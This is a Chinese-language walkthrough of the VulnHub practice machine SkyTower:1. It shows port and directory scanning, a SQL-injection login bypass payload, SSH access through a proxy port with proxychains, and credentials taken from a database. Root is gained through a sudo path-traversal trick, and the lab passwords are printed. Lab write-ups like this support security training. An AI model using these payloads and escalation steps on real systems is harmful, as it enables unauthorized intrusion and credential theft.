vulnhub系列:SkyTower:1
一、信息收集
nmap扫描存活
nmap 192.168.23.0/24
nmap扫描端口,开放22、80、3128端口
nmap 192.168.23.171 -p- -sV -Pn -O
dirb目录扫描,没什么发现
dirb http://192.168.23.171/
访问80端口,有一个登录框,测试是否存在sql注入
这里有返回sql报错
尝试万能密码,经过尝试,发现有过滤一些字符,万能密码如下
1' || 1=1 #
成功登录,这里提示通过ssh连接,且给出了账号密码
john:hereisjohn
二、getshell
连接ssh,无法连接,之前扫描到的3128为代理端口,可能需要代理
ssh john@192.168.23.171
配置代理文件,在图中位置写入代理配置
vim /etc/proxychains4.conf
使用代理连接ssh,还是连接不上,加-t参数,强制分配伪终端,成功连接
proxychains ssh john@192.168.23.171 -t "/bin/sh"
三、提权
查看当前权限,没有可利用的
sudo -l
那么需要考虑从数据库入手,进入/var/www,查看文件
在login.php文件中,发现数据库账号密码
登录数据库
mysql -uroot -proot
查库名
show databases;
查看SkyTech库
use SkyTech;
show tables;
查看login表下内容
select * from login;
得到其他用户的账号密码
john:hereisjohn
sara:ihatethisjob
william:senseable
ssh进行连接,并查看权限
proxychains ssh sara@192.168.23.171 -t "/bin/sh"
sudo -l
cat 和 ls 命令在通过/accounts/目录后,是以root权限执行的,查看当前目录
sudo ls /accounts/..
先查看root目录下有没有东西
sudo ls /accounts/../root
发现一个flag.txt,查看其内容,得到root用户密码
sudo cat /accounts/../root/flag.txt
root:theskytower
ssh连接root,成功连接,提权成功
proxychains ssh root@192.168.23.171 -t "/bin/sh"